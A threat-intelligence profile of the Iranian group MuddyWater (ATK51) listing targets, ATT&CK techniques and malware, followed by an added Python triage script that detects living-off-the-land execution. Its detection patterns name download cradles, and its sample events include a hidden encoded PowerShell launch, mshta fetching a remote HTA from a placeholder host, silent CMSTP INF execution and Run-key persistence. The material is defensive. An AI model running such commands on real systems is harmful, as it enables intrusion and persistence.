ATK51

Presumed Origin: Iran

Alias: MERCURY, MobhaM, MuddyWater, NTSTATS, POWERSTATS, Seedworm, Static Kitten, TEMP.Zagros

ATK51 (aka MuddyWater) is an Iranian threat group whose attacks primarily target Middle Eastern nations. Attacks have also been observed against surrounding nations and beyond, including targets in India and the USA. MuddyWater intrusions are characterised by a slowly evolving PowerShell-based first-stage backdoor known as POWERSTATS. Despite broad scrutiny and public reporting on MuddyWater activity, the group keeps operating with only incremental changes to its tools and techniques.


Target sector

  • Defense
  • Education
  • Energy
  • Financial Services
  • Government and administration agencies
  • Healthcare
  • High-Tech
  • International Organizations
  • Media

Target countries

  • Austria
  • Azerbaijan
  • Bahrain
  • Georgia
  • Russian Federation
  • Pakistan
  • Israel
  • Jordan
  • Iraq
  • Iran, Islamic Republic Of
  • India
  • Mali
  • Saudi Arabia
  • Turkey
  • United Arab Emirates
  • United States Of America

Attack pattern

  • T1002 - Data Compressed
  • T1003 - Credential Dumping
  • T1016 - System Network Configuration Discovery
  • T1027 - Obfuscated Files or Information
  • T1033 - System Owner/User Discovery
  • T1036 - Masquerading
  • T1047 - Windows Management Instrumentation
  • T1057 - Process Discovery
  • T1059 - Command-Line Interface
  • T1060 - Registry Run Keys / Startup Folder
  • T1063 - Security Software Discovery
  • T1064 - Scripting
  • T1081 - Credentials in Files
  • T1082 - System Information Discovery
  • T1083 - File and Directory Discovery
  • T1085 - Rundll32
  • T1086 - PowerShell
  • T1088 - Bypass User Account Control
  • T1090 - Connection Proxy
  • T1104 - Multi-Stage Channels
  • T1105 - Remote File Copy
  • T1113 - Screen Capture
  • T1140 - Deobfuscate/Decode Files or Information
  • T1170 - Mshta
  • T1173 - Dynamic Data Exchange
  • T1175 - Distributed Component Object Model
  • T1191 - CMSTP
  • T1193 - Spearphishing Attachment
  • T1204 - User Execution
  • T1500 - Compile After Delivery
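The technique list above names several Windows living-off-the-land binaries (PowerShell, mshta, rundll32, CMSTP) plus Run-key persistence and document-driven execution. The following script is an added example, not code from the original page and not a published vendor detection rule: it triages Windows process-creation events (Sysmon Event ID 1 style fields: ParentImage, Image, CommandLine) against a small rule set that I mapped onto the technique IDs listed on this page. The event records in SAMPLE_EVENTS are constructed for illustration; the rule mapping (for example, treating an Office parent spawning a shell as T1204) is my assumption. These are triage heuristics, not high-fidelity detections: legitimate administration scripts also use encoded or hidden PowerShell, so hits need analyst review.

```python
"""Triage process-creation events against the MuddyWater TTPs listed on this page.

Added example. SAMPLE_EVENTS are constructed records, and the rule-to-technique
mapping below is an editorial assumption, not a vendor or MITRE rule set.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

Event = Dict[str, str]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


@dataclass
class Rule:
    tid: str                          # ATT&CK technique ID as listed on this page
    name: str
    match: Callable[[Event], bool]    # predicate over one process-creation event


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _powershell_suspicious(ev: Event) -> bool:
    # Encoded command, hidden window, or a download/eval cradle on the command line.
    cl = ev["CommandLine"]
    return image_name(ev["Image"]) in {"powershell.exe", "pwsh.exe"} and (
        re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", cl) is not None
        or re.search(r"(?i)-w(indowstyle)?\s+hidden", cl) is not None
        or re.search(r"(?i)downloadstring|downloadfile|frombase64string|\biex\b|invoke-expression", cl) is not None)


def _mshta_remote(ev: Event) -> bool:
    # mshta pulling an HTA over HTTP or running inline vbscript:/javascript:.
    return image_name(ev["Image"]) == "mshta.exe" and \
        re.search(r"(?i)https?://|vbscript:|javascript:", ev["CommandLine"]) is not None


def _rundll32_script(ev: Event) -> bool:
    # rundll32 evaluating script or loading a DLL from a user-writable location.
    return image_name(ev["Image"]) == "rundll32.exe" and re.search(
        r"(?i)javascript:|\\users\\|\\appdata\\|\\temp\\|\\programdata\\", ev["CommandLine"]) is not None


def _cmstp_inf(ev: Event) -> bool:
    # cmstp with silent/no-install switches or an explicit .inf profile.
    return image_name(ev["Image"]) == "cmstp.exe" and \
        re.search(r"(?i)/ni\b|/s\b|\.inf\b", ev["CommandLine"]) is not None


def _office_spawns_script_host(ev: Event) -> bool:
    # Office application as parent of a shell or script host (macro/DDE-driven execution).
    return image_name(ev["ParentImage"]) in OFFICE_APPS and image_name(ev["Image"]) in SCRIPT_HOSTS


def _run_key_persistence(ev: Event) -> bool:
    # reg.exe adding a value under a CurrentVersion\Run key.
    cl = ev["CommandLine"]
    return image_name(ev["Image"]) == "reg.exe" and \
        re.search(r"(?i)\badd\b", cl) is not None and \
        re.search(r"(?i)\\currentversion\\run", cl) is not None


RULES: List[Rule] = [
    Rule("T1086", "PowerShell encoded/hidden/download cradle", _powershell_suspicious),
    Rule("T1170", "Mshta executing remote or inline script", _mshta_remote),
    Rule("T1085", "Rundll32 with script or user-writable path", _rundll32_script),
    Rule("T1191", "CMSTP with INF / silent switches", _cmstp_inf),
    Rule("T1204", "Office application spawning a script host", _office_spawns_script_host),
    Rule("T1060", "Run-key persistence via reg.exe", _run_key_persistence),
]


def triage(events: List[Event]) -> Dict[int, List[str]]:
    """Return {event index: [matched technique IDs]} for events hitting at least one rule."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        matched = [r.tid for r in RULES if r.match(ev)]
        if matched:
            hits[i] = matched
    return hits


# Constructed sample events (not real telemetry); paths and hosts are placeholders.
SAMPLE_EVENTS: List[Event] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://example.invalid/a.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\user\AppData\Local\Temp\x.inf"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\user\AppData\Roaming\u.vbs"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]

if __name__ == "__main__":
    for idx, tids in triage(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {', '.join(tids)}  <- {image_name(ev['Image'])}: {ev['CommandLine'][:60]}")
```

Run over the constructed events, the script flags the Office-to-cmd chain, the hidden encoded PowerShell, the remote HTA, the CMSTP INF execution and the Run-key write, and leaves the notepad event alone. In production the same predicates would be fed from Sysmon or EDR process telemetry and tuned with allow-lists for known administration tooling.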

Motivation

  • Espionage

Malware

  • Mori
  • MuddyC3
  • POWERSTATS
  • PowGoop

Vulnerabilities

  • CVE-2020-1472